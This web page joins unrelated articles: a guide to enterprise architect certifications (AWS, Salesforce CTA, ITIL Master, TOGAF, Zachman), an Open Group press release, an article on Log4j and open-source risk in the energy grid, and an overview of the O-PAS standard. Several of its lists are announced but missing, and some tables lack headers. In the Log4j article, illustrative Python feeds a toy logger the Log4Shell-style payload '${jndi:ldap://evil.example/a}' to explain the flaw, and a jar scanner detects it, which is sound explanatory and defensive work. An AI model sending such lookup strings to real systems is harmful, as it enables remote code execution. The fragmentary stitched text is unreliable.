Enterprise IT architect certifications sit at the apex of most certification programs, a level fewer than 1% of IT professionals ever reach. Even so, many IT architect certifications are available, and you don't need to buy into a single certification sponsor's vision to reach the top.
Many IT certifications in this area are vendor-neutral (or vendor-agnostic), falling outside any single vendor's umbrella. Even so, vendor-specific architect certifications outnumber vendor-neutral ones by more than 2 to 1. That's why we devote the last section of this article to those vendor-specific credentials, which we encountered in our search for the best enterprise architect certifications.
For IT pros who’ve already invested in vendor-specific certification programs, credentials at the architect level may indeed be worth pursuing. Enterprise architects are among the highest-paid employees and consultants in the tech industry.
Enterprise architects are technical experts who are able to analyze and assess organizational needs, make recommendations regarding technology changes, and design and implement those changes across the organization.
According to SimplyHired, the national average salary is $130,150, in a range from $91,400 to a whopping $185,330. Glassdoor reports an average of $133,433. Ultimately, the value of any IT certification depends on how long the individual has worked and in which corner of the IT field.
Becoming an enterprise architect is not easy. While the requirements may vary by employer, most enterprise architects have a bachelor’s degree or higher in a computer-related field along with 5-10 years of professional work experience. Many enterprise architects obtain additional certifications past graduation.
Certifications are a great way to demonstrate to prospective employers that you have the experience and technical skills necessary to do the job, and they give you a competitive edge in the hiring process. Certification holders also frequently earn more than their uncertified counterparts, making certifications a valuable career-building tool.
Below, you'll find our top five certification picks. Before you peruse them, check out the results of our informal job board survey. The data indicates the number of job posts in which each featured certification was mentioned on a given day and should give you an idea of each credential's relative popularity.
| Certification (sponsor) |  |  |  |  | Total |
|---|---|---|---|---|---|
| AWS Certified Solutions Architect (Amazon Web Services) | 1,035 | 464 | 2,672 | 240 | 4,411 |
| ITIL Master (Axelos) | 641 | 848 | 1,218 | 1,119 | 3,826 |
| TOGAF 9 (The Open Group) | 443 | 730 | 271 | 358 | 1,802 |
| Zachman Certified – Enterprise Architect (Zachman) | 86 | 107 | 631 | 252 | 1,076 |
Making its first appearance on the leaderboard is the Certified Solutions Architect credential from Amazon Web Services (AWS). AWS, an Amazon subsidiary, is the global leader in on-demand cloud computing. AWS offers numerous products and services to support its customers, including the popular Amazon Simple Storage Service (S3) and Amazon Elastic Compute Cloud (EC2). AWS also offers numerous cloud applications and developer tools, including Amazon Comprehend, Amazon SageMaker Batch Transform and Amazon Lightsail.
AWS offers certifications at the foundation, associate and professional levels across five role-based categories: architect, developer, operations, cloud and specialty certifications. Foundation-level certifications validate a candidate’s understanding of the AWS Cloud and serve as a prerequisite to AWS specialty certifications. Foundation certifications are a recommended starting place for those seeking higher-level credentials.
Associate credentials typically have no prerequisites and focus on technical skills. They are required to obtain professional-level certifications, which are the highest level of technical certification available. Specialty certs, meanwhile, focus on skills in targeted areas.
AWS currently offers the following credentials:
The AWS Certified Solutions Architect credential is available at the associate and professional levels. The associate credential targets candidates with at least one year of experience architecting and implementing solutions based on AWS applications and technologies. AWS updated the associate-level exam in February 2018 to include architecture best practices and new services.
The AWS Certified Solutions Architect – Professional certification targets senior AWS architects who can architect, design, implement and manage complex enterprise-level AWS solutions based on defined organizational requirements. Candidates should have a minimum of two years’ direct experience deploying and designing on the AWS cloud and be able to translate organizational requirements into solutions and recommend best practices. The associate credential is a mandatory prerequisite.
| Certification name | Certified Solutions Architect – Associate<br>Certified Solutions Architect – Professional |
|---|---|
| Prerequisites and required courses | Associate: One year of hands-on experience recommended; AWS Certified Cloud Practitioner<br>Professional: Certified Solutions Architect – Associate credential, plus a minimum of two years of hands-on experience |
| Number of exams | Associate: One exam (65 questions, 130 minutes to complete)<br>Professional: One exam (170 minutes to complete) |
| Certification fees | Associate: $150 (practice exam $20)<br>Professional: $300 (practice exam $40) |
| Self-study materials | AWS makes sample questions, practice exams, exam guides, whitepapers and more available on the certification home page. |
CTA: Certified Technical Architect
In 1999, Salesforce revolutionized the world of CRM when it introduced the concept of using the cloud to provide top-notch CRM software. Today, Salesforce has more than 150,000 customers, making it the industry leader for CRM enterprise cloud platforms. Currently, Salesforce offers solutions for various focus areas, including sales, service, marketing, commerce, engagement, community, productivity (Quip), platform and ecosystem, integration, analytics, enablement, internet of things (IoT), artificial intelligence, mobility, and industry (financial and health).
To meet industry needs for qualified and experienced professionals with the skills necessary to support its growing customer base, Salesforce developed and maintains a top-tier certification program. It offers many paths to candidates, including for administration, app building, architecture and marketing.
Salesforce Architect certifications are hierarchical, with most (but not all) lower-level credentials serving as prerequisites for more advanced credentials. At the top of the certification pyramid is the highest credential a Salesforce professional can earn – the Certified Technical Architect (CTA), which is our featured Salesforce certification.
The Salesforce Architect certification pyramid has three levels:
Salesforce requires CTAs to maintain current skills. Credential holders must pass maintenance module exams with each new product release cycle (typically in summer, winter and spring). While challenging to earn, the CTA is important for IT professionals who are serious about a Salesforce technologies career.
| Certification name | Certified Technical Architect (CTA) |
|---|---|
| Prerequisites and required courses | Salesforce Certified Application Architect and Salesforce Certified System Architect credentials |
| Number of exams | One exam (four hours to complete; candidates must formulate, justify and present recommendations based on a hypothetical scenario to a review board) |
| Certification fees | Retake fee: $3,000 |
| Self-study materials | Salesforce maintains links on the certification webpage to numerous review materials, including the online documentation, tip sheets, user guides, exam guide and outline, Architect Journey e-books, Trailhead trails, and the Salesforce Certification Guide. |
ITIL Master Certificate – IT Service Management
One of our favorite credential sets (and a favorite of employers as well, judging by job board numbers) is the ITIL for IT Service Management lineup from Axelos. Axelos is a global provider of standards designed to drive best practices and quality throughout organizations. ITIL (Information Technology Infrastructure Library) joined the Axelos family in 2013.
Axelos manages ITIL credentialing requirements and updates, provides accreditation to Examination Institutes (EIs), and licenses organizations seeking to use ITIL. In addition to ITIL certifications, Axelos offers credentials for Prince2 2017 (which includes Foundation, Practitioner and Agile qualifications), Prince2 Agile, Resilia, MSP, MoP, M_o_R, P30, MoV, P3M3 and AgileSHIFT.
ITIL is a well-defined and well-respected set of best practices that specifically targets IT service management. It is perhaps the most widely known and most globally adopted set of best practices and management tools for IT service management and support, with more than 2 million ITIL-certified practitioners worldwide.
Axelos maintains a robust ITIL certification portfolio consisting of five ITIL credentials:
Axelos introduced ITIL 4 in early 2019. ITIL 3 practitioners should check the Axelos website frequently for updates about the transition to ITIL 4 and availability of the ITIL 4 transition modules.
The ITIL Master is the pinnacle ITIL certification, requiring experience, dedication, and a thorough understanding of ITIL principles, practices, and techniques. To gain the ITIL Master designation, candidates must have at least five years of managerial, advisory or other leadership experience in the field of IT service management. They must also possess the ITIL Expert certification. Once the skill and certification requirements are met, the real certification work begins.
Upon completing the prerequisites, candidates must register with PeopleCert, the sole approved Axelos Examination Institute, and submit an application. Next, candidates prepare and submit a proposal for a business improvement to implement within their organization. The proposal submission is followed by a “work package,” which documents a real-world project that encompasses multiple ITIL areas.
The work package (1) validates how the candidate applied ITIL principles, practices, and techniques to the project; and (2) documents the effectiveness of the solution and the ultimate benefit the business received as a result of the ITIL solution. Finally, candidates must pass an interview with an assessment panel where they defend their solution.
Axelos will soon be sponsoring 50 lucky people in their quest to obtain the ITIL 4 Master certification. You can register your interest in the program on the Axelos website.
| Certification name | ITIL Master Certificate – IT Service Management |
|---|---|
| Prerequisites and required courses | ITIL Expert certification; five years of IT service management experience in managerial, leadership or advisory roles |
| Number of exams | No exam required, but candidates must complete the proposal, work package and interview steps described above |
| Certification fees | $4,440 if all ITIL credits were obtained through PeopleCert<br>$5,225 if some ITIL credits were obtained from other institutes |
| Self-study materials | Axelos provides documentation to guide candidates in the preparation of proposal and work package submissions. Available documents include ITIL Master FAQs, ITIL Master Proposal Requirements and Scope, and ITIL Master Work Package Requirements and Scope. |
The Open Group is a leader in enterprise architecture, and its standards and certifications are globally recognized. The TOGAF (The Open Group Architecture Framework) standard for enterprise architecture is popular among leading enterprise-level organizations. Currently, TOGAF is the development and architecture framework of choice for more than 80% of global enterprises.
TOGAF’s popularity reflects that the framework standard is specifically geared to all aspects of enterprise-level IT architectures, with an emphasis on building efficiency within an organization. The scope of the standard’s approach covers everything from design and planning stages to implementation, maintenance, and governance.
The Open Group offers several enterprise architect credentials, including TOGAF, Open CA, ArchiMate, IT4IT and the foundational Certified Technical Specialist (Open CTS).
The Open Group reports that there are more than 75,000 TOGAF-certified enterprise architects. At present, there are two TOGAF credentials: the TOGAF 9 Foundation (Level 1) and TOGAF 9 Certified (Level 2). (The TOGAF framework is currently based on version 9.2, although the credential name still reflects version 9.)
The TOGAF 9 Foundation, or Level 1, credential targets architects who demonstrate an understanding of TOGAF principles and standards. A single exam is required to earn the Level 1 designation. The Level 1 exam focuses on TOGAF-related concepts such as TOGAF reference models, terminology, core concepts, standards, ADM, architectural governance and enterprise architecture. The Level 1 credential serves as a steppingstone to the more advanced TOGAF Level 2 certification.
The TOGAF 9 Certified, or Level 2, credential incorporates all requirements for Level 1. Level 2 TOGAF architects possess in-depth knowledge of TOGAF standards and principles and can apply them to organizational goals and enterprise-level infrastructure. To earn this designation, candidates must first earn the Level 1 credential and pass the Level 2 exam. The Level 2 exam covers TOGAF concepts such as ADM phases, governance, content framework, building blocks, stakeholder management, metamodels, TOGAF techniques, reference models and ADM iterations.
Candidates wanting a fast track to Level 2 certification may take a combination exam, which covers requirements for both Level 1 and 2. Training is not mandatory for either credential but is highly recommended. Training classes run 2-5 days, depending on the provider and whether you’re taking the combined or single-level course. The Open Group maintains a list of approved training providers and a schedule of current training opportunities on the certification webpage.
| Certification name | TOGAF 9 Foundation (Level 1)<br>TOGAF 9 Certified (Level 2) |
|---|---|
| Prerequisites and required courses | Level 1: None<br>Level 2: TOGAF 9 Foundation (Level 1) credential |
| Number of exams | Level 1: One exam (40 questions, 60 minutes, 55% required to pass)<br>Level 2: One exam (eight questions, 90 minutes)<br>Combined Level 1 and 2 exam (48 questions, 2.5 hours) |
| Certification fees | $320 each for the Level 1 and Level 2 exams<br>$495 for the combined Level 1 and Level 2 exam<br>Exams are administered by Pearson VUE. Some training providers include the exam with the training course. |
| Self-study materials | A number of resources are available from The Open Group, including whitepapers, webinars, publications, TOGAF standards, the TOGAF Foundation Study Guide ($29.95 for PDF; includes a practice exam), practice questions (99 cents for PDF) and the TOGAF 9 Certified Study Guide (a combined study guide is available for $59.95). The Open Group also maintains a list of accredited training course providers and a calendar of training events. |
Zachman Certified – Enterprise Architect
Founded in 1990, Zachman International promotes education and research for enterprise architecture and the Zachman Framework. The Zachman Framework is not a traditional process or methodology but is more accurately described as an "ontology": rather than focusing on process or implementation, an ontology describes the properties, types and interrelationships of the entities that exist within a particular domain. The Zachman Framework ontology focuses on the structure, or definition, of the enterprise and its objects. Developed by John Zachman, the framework sets the standard for enterprise architecture ontology.
Zachman International currently offers four enterprise architect credentials:
Zachman credentials are valid for three years. To maintain these credentials, candidates must earn continuing education credits (referred to as EADUs). The total number of EADUs required varies by certification level.
| Certification name | Enterprise Architect Associate Certification (Level 1)<br>Enterprise Architect Practitioner Certification (Level 2)<br>Enterprise Architect Professional Certification (Level 3)<br>Enterprise Architect Educator Certification (Level 4) |
|---|---|
| Prerequisites and required courses | Level 1 Associate: Four-day Modeling Workshop ($3,499)<br>Level 2 Practitioner: None<br>Level 3 Professional: None<br>Level 4 Educator: Review all materials related to the Zachman Framework; Level 3 Professional recommended |
| Number of exams | Level 1 Associate: One exam<br>Level 2 Practitioner: No exam; case studies and referee review required<br>Level 3 Professional: No exam; case studies and referee review required<br>Level 4 Educator: No exam; must develop and submit curriculum and course materials for review and validation |
| Certification fees | Level 1 Associate: Exam fee included in the required course<br>Level 2 Practitioner: None; included as part of the Level 1 required course<br>Level 3 Professional: Not available<br>Level 4 Educator: Not available |
| Self-study materials | Live classroom and distance learning opportunities are available. Zachman also offers webcasts, a glossary, the Zachman Framework for Enterprise Architecture and reference articles. |
Beyond the top 5: More enterprise architect certifications
The Red Hat Certified Architect (RHCA) is a great credential, especially for professionals working with Red Hat Enterprise Linux.
The Project Management Professional (PMP) certification from PMI continues to appear in many enterprise architect job descriptions. Although the PMP is not an enterprise architect certification per se, many employers look for this particular combination of skills.
Outside of our top five vendor-neutral enterprise architect certifications (which focus on more general, heterogeneous views of IT systems and solutions), there are plenty of architect-level certifications from a broad range of vendors and sponsors, most of which are vendor-specific.
The table below identifies those vendors and sponsors, names their architect-level credentials, and provides links to more information on those offerings. Which of these certifications you research or pursue will depend on where you work or where you'd like to work.
| Sponsor | Enterprise architect certification | More information |
|---|---|---|
| BCS | BCS Practitioner Certificate in Enterprise and Solutions Architecture | BCS homepage |
| Cisco | Cisco Certified Architect (CCAr) | CCAr homepage |
| Dell EMC | EMC Cloud Architect Expert (EMCCAe) | GoCertify |
| Enterprise Architecture Center of Excellence (EACOE) | EACOE Enterprise Architect<br>EACOE Senior Enterprise Architect<br>EACOE Distinguished Enterprise Architect<br>EACOE Enterprise Architect Fellow | EACOE Architect homepage |
| FEAC Institute | Certified Enterprise Architect (CEA) Black Belt<br>Associate Certified Enterprise Architect (ACEA) Green Belt | FEAC CEA homepage |
| Hitachi Vantara | Hitachi Architect (three tracks: Infrastructure, Data Protection, and Pentaho Solutions)<br>Hitachi Architect Specialist (two tracks: Infrastructure and Converged) | Training & Certification homepage |
| IASA | Certified IT Architect – Foundation (CITA-F)<br>Certified IT Architect – Associate (CITA-A)<br>Certified IT Architect – Specialist (CITA-S)<br>Certified IT Architect – Professional (CITA-P) | |
| National Instruments | Certified LabVIEW Architect (CLA) | CLA homepage |
| Nokia | Nokia Service Routing Architect (SRA) | SRA homepage |
| Oracle | Oracle Certified Master, Java EE Enterprise Architect | Java EE homepage |
| Red Hat | Red Hat Certified Architect (RHCA) | RHCA homepage |
| SOA (Arcitura) | Certified SOA Architect | SOA Architect homepage |
These architect credentials typically represent the pinnacle of the certification programs to which they belong, functioning in many cases as high-value capstones. Few individuals attain them, but those who do gain tight sponsor relationships, high levels of sponsor support and information delivery, and stratospheric salaries and professional kudos.
Often, such certifications provide deliberately difficult and challenging targets for a small, highly select group of IT professionals. Earning one or more of these certifications is generally the culmination of a decade or more of professional growth, high levels of effort, and considerable expense. No wonder, then, that architect certifications are highly regarded by IT pros and highly valued by their employers.
Your choice of enterprise architect credential will often be dictated by decisions your employer (or industry sector, in the case of government or DoD-related work environments) has already made independent of your own efforts. Likewise, most of the vendor-specific architecture credentials make sense based on what's deployed in your work environment or in a job you'd like to occupy.
Though IT pros have lots of potential certifications to choose from, the ones they can or should pursue will depend on their circumstances.
The Open Group today announced the immediate availability of its new book, Cloud Computing for Business, which takes an in-depth look at Cloud Computing and how enterprises can derive the greatest business benefit from its potential. The publication is part of the ongoing work of The Open Group Cloud Computing Work Group, which exists to create, among buyers and suppliers, a common understanding of how enterprises of all sizes and scales of operation can use Cloud Computing technology in a safe and secure way in their architectures to realize its significant cost, scalability and agility benefits.
Intended for a variety of corporate stakeholders — from the executive suite to business managers, the IT and marketing departments, as well as enterprise and business architects — the book reflects the combined experience of member companies of The Open Group and their collective understanding shared with the wider IT community as practical guidance for considering Cloud Computing. The book explores the importance of Cloud Computing within the overall technology landscape and provides practical advice for companies considering using the Cloud, as well as ways to assess the risk in Cloud initiatives and build return on investment.
“With each new technology trend that emerges, the resulting hype cycle often obscures how companies can actually take advantage of the new phenomenon and share in its growth and benefits,” said Dr. Chris Harding, Director, Interoperability, The Open Group. “The Cloud Computing Work Group was established by Open Group members to help enterprises of all sizes make sense of Cloud Computing and provide the understanding necessary to make it work for them. The Open Group and our member community are excited to release this book, which pays special consideration to an organization’s technical and business requirements, and aims to help readers gain the greatest value possible from their Cloud projects.”
Key themes covered in the book include:
• Why Cloud?
• Establishing Your Cloud Vision
• Buying Cloud Services
• Understanding Cloud Risk
• Building Return on Investment from Cloud Computing
• Cloud Challenges for the Business
Cloud Computing for Business is available for download from The Open Group at https://www2.opengroup.org/ogsys/jsp/publications/PublicationDetails.jsp?publicationid=12431 and as a hard copy from Van Haren Publishing at http://www.vanharen-library.net/cloudcomputingforbusinesstheopengroupguide-p994.html. The hardcopy version retails for $58 in the U.S., £37 in the United Kingdom and €39.95 in Europe.
TYSONS CORNER, VA, April 26, 2018: Andras Szakal, vice president and chief technology officer of the U.S. federal business at IBM (NYSE: IBM), has received recognition from The Open Group industry consortium for his contributions to driving innovation through open technology standards, ExecutiveBiz reported Tuesday. The organization ...
The worst computer vulnerability in recent years was in a ubiquitous piece of open-source software: a bug that was as simple to exploit as it was difficult to patch.
The Apache Log4j security flaw opened the door to millions of computers, but the extent of the damage still isn’t fully understood. Nearly a year later, federal officials and Congress are still discussing how to avoid another potential disaster.
Open source, which is code that is “open” to everyone to use or edit, can be found in nearly every type of modern technology. It has served as the backbone of the internet, and is pervasive throughout the economy — including in the energy sector.
That makes it a looming issue for energy cybersecurity.
“Of course, [the Energy Department] is concerned about open-source software,” said Cheri Caddy, a former senior adviser at DOE who is currently director of cyber policy and plans at the Office of the National Cyber Director. “Open-source software is a part of all software development, whether it’s [operational technology] or IT. It’s just ubiquitous in everything now.”
The Log4j security lapse highlighted some of the key concerns: The development team was small, the software was found in nearly every industry, and many companies were unsure if they even had the code in their products.
The problem, experts say, is not that open source is inherently less secure than proprietary software. It’s not. But a few lines of code can be adopted throughout an entire industry.
When those few lines contain a serious vulnerability, that can be a problem for critical infrastructure, including the grid. It can become an open door that allows malicious hackers to walk into critical systems — especially when utilities aren’t aware that the door even exists.
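The class of bug behind the Log4j flaw can be illustrated with a toy example. The sketch below is purely illustrative Python (the real flaw lived in Log4j's Java lookup feature, and the `resolve_lookup` stub here stands in for a dangerous remote JNDI lookup): a logger expands `${...}` lookup expressions after untrusted input has already been mixed into the message, so attacker-supplied text drives the lookup.

```python
import re

def resolve_lookup(expr: str) -> str:
    # Harmless stand-in for Log4j's lookup mechanism (JNDI, env, etc.).
    # In the real vulnerability, a ${jndi:...} lookup could fetch and
    # execute attacker-controlled code from a remote server.
    return f"<resolved:{expr}>"

def vulnerable_log(template: str, user_input: str) -> str:
    message = template.format(user=user_input)
    # The bug: lookup expressions are expanded AFTER untrusted data
    # is already part of the message, so user input can trigger lookups.
    return re.sub(r"\$\{([^}]*)\}",
                  lambda m: resolve_lookup(m.group(1)), message)

def patched_log(template: str, user_input: str) -> str:
    # The fix: never treat logged data as lookup syntax.
    return template.format(user=user_input)

attacker = "${jndi:ldap://evil.example/a}"
print(vulnerable_log("login attempt by {user}", attacker))  # lookup fires
print(patched_log("login attempt by {user}", attacker))     # logged verbatim
```

The patched version simply refuses to interpret logged data, which is essentially what the Log4j fixes did by disabling message lookups.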
In the energy sector, open-source software is everywhere, said Virginia Wright, an energy cybersecurity portfolio program manager at Idaho National Laboratory (INL).
Wright manages a DOE grid vulnerability testing bed called Cyber Testing for Resilient Industrial Control Systems (CyTRICS). The program, run by six DOE labs and led by INL, ferrets out vulnerabilities in the software that runs the power grid.
“One hundred percent of the systems that we have looked at have contained open-source software,” Wright said.
CyTRICS works on a voluntary basis with some of the biggest grid equipment manufacturers, like Hitachi Energy and Schweitzer Engineering Laboratories. Once a vulnerability is found, the lab reaches out to the manufacturers with potential mitigation measures to help patch the bug.
Sometimes that includes publicly known vulnerabilities. Because open-source software is freely available and widely used, vendors may not be aware that a vulnerability and patch even exist, Wright said.
Wright said that the labs have seen grid equipment vendors selling older versions of their products with known vulnerabilities and fixes. Some of that software is even updated in those vendors’ own systems, and their customers are “buying it with all of the vulnerabilities attached,” Wright said.
To avoid software with vulnerabilities, utilities “need to employ a pretty rigorous evaluation and testing process on their own,” she said.
The bipartisan infrastructure bill codifies and places the CyTRICS program under the Cyber Sense program. By September of next year, DOE aims to analyze around 10 percent of critical components in energy systems and expand the program’s voluntary partnerships to cover around 15 percent of market share, according to DOE’s two-year performance goal.
DOE also launched a pilot program for an energy-focused “software bill of materials,” which is similar to the food industry’s ingredient label. Such a label, experts say, can increase visibility into the software that runs critical infrastructure.
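An SBOM enables exactly this kind of check. The sketch below is a minimal, hypothetical illustration: the component list and advisory records are invented for the example and do not follow any actual SBOM or advisory format (though CVE-2021-44228 is the real Log4j identifier). It cross-references each declared component and version against a list of known-vulnerable versions.

```python
def find_vulnerable(sbom_components, advisories):
    """Return (name, version, advisory_id) for every SBOM entry that
    matches a known-vulnerable (name, version) pair."""
    vulnerable = {(a["name"], a["version"]): a["id"] for a in advisories}
    hits = []
    for comp in sbom_components:
        key = (comp["name"], comp["version"])
        if key in vulnerable:
            hits.append((comp["name"], comp["version"], vulnerable[key]))
    return hits

# Illustrative data only: a two-component inventory and one advisory.
sbom = [
    {"name": "log4j-core", "version": "2.14.1"},
    {"name": "openssl", "version": "3.0.7"},
]
advisories = [
    {"id": "CVE-2021-44228", "name": "log4j-core", "version": "2.14.1"},
]
print(find_vulnerable(sbom, advisories))  # flags the log4j-core entry
```

Without the inventory on the left-hand side of this check, an operator cannot even ask the question — which is why many organizations could not tell whether they ran Log4j at all.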
Congress also has begun to take further action. Sens. Gary Peters (D-Mich.) and Rob Portman (R-Ohio) — the chair and ranking member, respectively, of the Senate Homeland Security and Governmental Affairs Committee — have moved forward legislation that would direct the Cybersecurity and Infrastructure Security Agency to study ways to mitigate risks in critical infrastructure that uses open-source software.
The transparency of open-source software means that malicious hackers can look at the source code to find new vulnerabilities, said Keith Lunden, manager of cyber physical threat analysis at cybersecurity firm Mandiant.
However, it’s a two-way street. Cybersecurity researchers have the same access, so they can identify and fix those vulnerabilities before malicious hackers have a chance to exploit them, Lunden said.
And unlike proprietary software, open-source software doesn’t have a shelf life. Vendors will eventually stop supporting a software product; the same isn’t true for open-source. For industrial systems that are designed to operate for decades, that longevity is key.
“With open-source software, the community has access to the source, and they can independently develop patches indefinitely, which can be an important factor for OT security,” Lunden said.
At least that’s the idea.
The flexibility of open source can mean that it’s constantly branching into new code: Individuals and companies may adapt it for their use, potentially creating new vulnerabilities.
Thomas Pace, co-founder of cybersecurity firm NetRise and a former DOE contractor in industrial control security, said he knows of a major telecommunications vendor that will take open-source software and rewrite portions of the code.
“That just then introduces a different set of problems, right? Because now you have to maintain your own code versus the whole community maintaining the code,” he said. “Is that better, is that worse? That’s a debate.”
An open-source bug can also mean widespread risk. In 2014, hackers took advantage of a massive vulnerability in an open-source encryption program called OpenSSL.
But the incident, called Heartbleed, involved a single vulnerability. Once the bug was fixed, the onus was on vendors and owners to patch their systems. If, instead, each software vendor had created its own version of OpenSSL, there would have been separate vulnerabilities in each version.
“So it’s about a trade-off,” said Wright.
The discovery of the Log4j vulnerability prompted the White House to hold an open-source software security summit last January. The meeting — which included top U.S. cyber experts, agency officials and open-source leaders like the Linux Foundation — aimed to strengthen federal and private collaboration so the software would be more secure.
In the months since, the Cybersecurity and Infrastructure Security Agency has promoted the use of a software bill of materials as a step to secure open-source software. CISA also plans to work with the open-source security community to identify commonly used code in critical infrastructure, in an effort to better understand where collaboration can take place.
But the agency highlighted that it can be a challenge to work with an open-source community when, by definition, it’s open to anyone. While there are some foundations that promote open-source development, software is often developed by small teams or single individuals.
In the meantime, CISA, the National Security Agency and Office of the Director of National Intelligence released best practices for open source developers to better secure their code.
As for the Log4j vulnerability, “significant risk remains,” according to a report this year from the Department of Homeland Security’s Cyber Safety Review Board.
The board, created by executive order in 2021, found that systems using the vulnerable Log4j version would be a major issue for “perhaps a decade or longer.”
The report concludes that the vulnerability did not lead to significant cyberattacks to critical infrastructure.
But NetRise’s Pace called that an “impossible statement,” and even the report notes that it’s not so cut-and-dried.
“While cybersecurity vendors were able to provide some anecdotal evidence of exploitation, no authoritative source exists to understand exploitation trends across geographies, industries, or ecosystems. Many organizations do not even collect information on specific Log4j exploitation, and reporting is still largely voluntary,” the board wrote in the report.
In short, organizations themselves sometimes aren’t aware that they have been targeted by malicious hackers. There is no list of where the Log4j software is installed.
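Absent such a list, organizations are left to scan their own estates. A minimal sketch of the approach, in Python, flags `log4j-core` jars older than a patched release (the filename pattern and the 2.17.1 cutoff are illustrative; consult current advisories for the authoritative versions):

```python
import re
from pathlib import Path

# Treat log4j-core below 2.17.1 as vulnerable for illustration only;
# consult current advisories for the authoritative cutoff.
SAFE_VERSION = (2, 17, 1)
JAR_PATTERN = re.compile(r"log4j-core-(\d+)\.(\d+)\.(\d+)\.jar$")

def find_vulnerable_log4j(root):
    """Walk a directory tree and flag log4j-core jars older than SAFE_VERSION."""
    hits = []
    for path in Path(root).rglob("log4j-core-*.jar"):
        m = JAR_PATTERN.search(path.name)
        if m and tuple(int(g) for g in m.groups()) < SAFE_VERSION:
            hits.append(str(path))
    return sorted(hits)
```

Real scanners also have to look inside fat jars and container images, where Log4j is often bundled rather than sitting on disk under its own name.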
The report also highlights the “security risks unique to the thinly-resourced, volunteer-based open source community.” It calls for centralized resources to help developers ensure their code is created to the latest security standards.
“Just as the software industry has enabled the democratization of software programming — the ability for anyone to generate software with little or no formal training — we must also democratize security by baking security by default into the platforms used to generate, build, deploy, and manage software at scale,” the report concludes.
A detailed look at O-PAS™ Standard, Version 1.0
By Dave Emerson
Process automation end users and suppliers have expressed interest in a standard that will make the industry much more open and modular. In response, the Open Process Automation™ Forum (OPAF) has worked diligently at this task since November 2016 to develop process automation standards. The scope of the initiative is wide-reaching, as it aims to address the issues associated with the process automation systems found in most industrial automation plants and facilities today (figure 1).
It is easy to see why a variety of end users and suppliers are involved in the project, because the following systems are affected:
In June 2018, OPAF released a technical reference model (TRM) snapshot as industry guidance of the technical direction being taken for the development of this new standard. The organization followed the TRM snapshot with the release of the OPAS™ Version 1.0 in January 2019. Version 1.0 addresses the interoperability of components in federated process automation systems. This is a first stop along a three-year road map with annual releases targeting the themes listed in table 1.
Table 1. The O-PAS Standard three-year release road map addresses progressively more detailed themes.
By publishing versions of the standard annually, OPAF intends to make its work available to industry expeditiously. This will allow suppliers to start building products and returning feedback on technical issues, and this feedback, along with end user input, will steer O-PAS development. O-PAS Version 1.0 was released as a preliminary standard of The Open Group to allow time for industry feedback.
The OPAF interoperability workshop in May 2019 is expected to produce feedback to help finalize the standard. The workshop allows member organizations to bring hardware and software that support O-PAS Version 1.0, testing it to verify the correctness and clarity of this preliminary standard. The results will not be published but will be used to update and finalize the standard.
Figure 1. A broad sampling of suppliers and end users are highly interested in the scope of the OPAS under development by OPAF, because it touches on all the key components of industrial automation systems: hardware (I/O), the communication network, system software (e.g., run time, namespace), application software, and the data model.
For clarity, a summary of the terminology associated with the OPAF initiative is:
Creating a "standard of standards" for open, interoperable, and secure automation is a complex undertaking. OPAF intends to speed up the process by leveraging the valuable work of various groups in a confederated manner.
The OPAS Standard will reference existing and applicable standards where possible. Where gaps are identified, OPAF will work with associated organizations to update the underlying standard or add OPAS requirements to achieve proper definition. Therefore, OPAF has already established liaison agreements with the following organizations:
Additionally, OPAF is in discussions with AutomationML and the ISA Security Compliance Institute (ISCI) as an ISA/IEC 62443 validation authority. In addition to these groups, the OPC Foundation has joined OPAF as a member, so no liaison agreement is required.
As an example of this cooperation in practice, OPAS Version 1.0 was created with significant input from three existing standards, including:
Configuration portability, now under development for OPAS Version 2.0, will address the requirement to move control strategies among different automation components and systems. This has been identified by end users as a requirement to allow their intellectual property (IP), in the form of control strategies, to be portable. Existing standards under evaluation for use in Version 2.0 include:
O-PAS Version 3.0 will address application portability, which is the ability to take applications purchased from software suppliers and move them among systems within a company in accordance with applicable licenses. This release will also include the first specifications for hardware interfaces.
The five parts that make up O-PAS Version 1.0 are listed below with a brief summary of how compliance will be checked (if applicable):
Part 1 - Technical Architecture Overview (informative) describes an OPAS-conformant system through a set of interfaces to the components. Read this section to understand the technical approach OPAF is following to create the O-PAS.
Part 2 - Security (informative) addresses the necessary cybersecurity functionality of components that are conformant to OPAS. It is important to point out that security is built into the standard and permeates it, as opposed to being bolted on as an afterthought. This part of the standard is an explanation of the security principles and guidelines that are built into the interfaces. More specific security requirements are detailed in normative parts of the standard. The detailed normative interface specifications are defined in Parts 3, 4, and 5. These parts also contain the associated conformance criteria.
Part 3 - Profiles defines sets of hardware and software interfaces for which OPAF will develop conformance tests to make sure products interoperate properly. The O-PAS Version 1 profiles are:
The term "Level" in the profile names refers to profile levels.
Part 4 - Connectivity Framework (OCF) forms the interoperable core of the system. The OCF is more than just a network; it is the underlying structure allowing disparate components to interoperate as a system. The OCF will use OPC UA for OPAS Versions 1.0, 2.0, and 3.0.
Part 5 - System Management covers foundational functionality and interface standards to allow the management and monitoring of components using a common interface. This part will address hardware, operating systems and platform software, applications, and networks, although at this point Version 1.0 only addresses hardware management.
Conformance criteria are identified by the verb "shall" within the O-PAS text. An OPAF committee is working on a conformance guide document that will be published later this year, which explains the conformance program and requirements for suppliers to obtain a certification of conformance.
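Because the normative verb "shall" marks conformance criteria, candidate requirements can be pulled out of the standard's text mechanically. A rough sketch of the idea (the sentence-splitting heuristic is ours, and the sample text in the test is invented, not quoted from O-PAS):

```python
import re

def extract_shall_statements(text):
    """Return the sentences of `text` containing the normative verb 'shall'."""
    sentences = re.split(r"(?<=[.!?])\s+", text)
    return [s.strip() for s in sentences if re.search(r"\bshall\b", s)]
```

Run over the normative Parts 3, 4, and 5, this would yield a first-cut requirements checklist of the kind the conformance guide is meant to formalize.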
The OPAS Standard supports communication interactions that are required within a service-oriented architecture (SOA) for automation systems by outlining the specific interfaces the hardware and software components will use. These components will be used to architect, build, and start up automation systems for end users.
The vision for the OPAS Standard is to allow the interfaces to be used in an unlimited number of architectures, thereby enabling each process automation system to be "fit for purpose" to meet specific objectives. The standard will not define a system architecture, but it will use examples to illustrate how the component-level interfaces are intended to be used. System architectures (figure 2) contain the following elements:
Distributed control node (DCN): A DCN is expected to be a microprocessor-based controller, I/O, or gateway device that can handle inputs and outputs and computing functions. A key feature of O-PAS is that hardware and control software are decoupled. So, the exact function of any single DCN is up to the system architect. A DCN consists of hardware and some system software that enables the DCN to communicate on the O-PAS network, called the OCF, and also allows it to run control software.
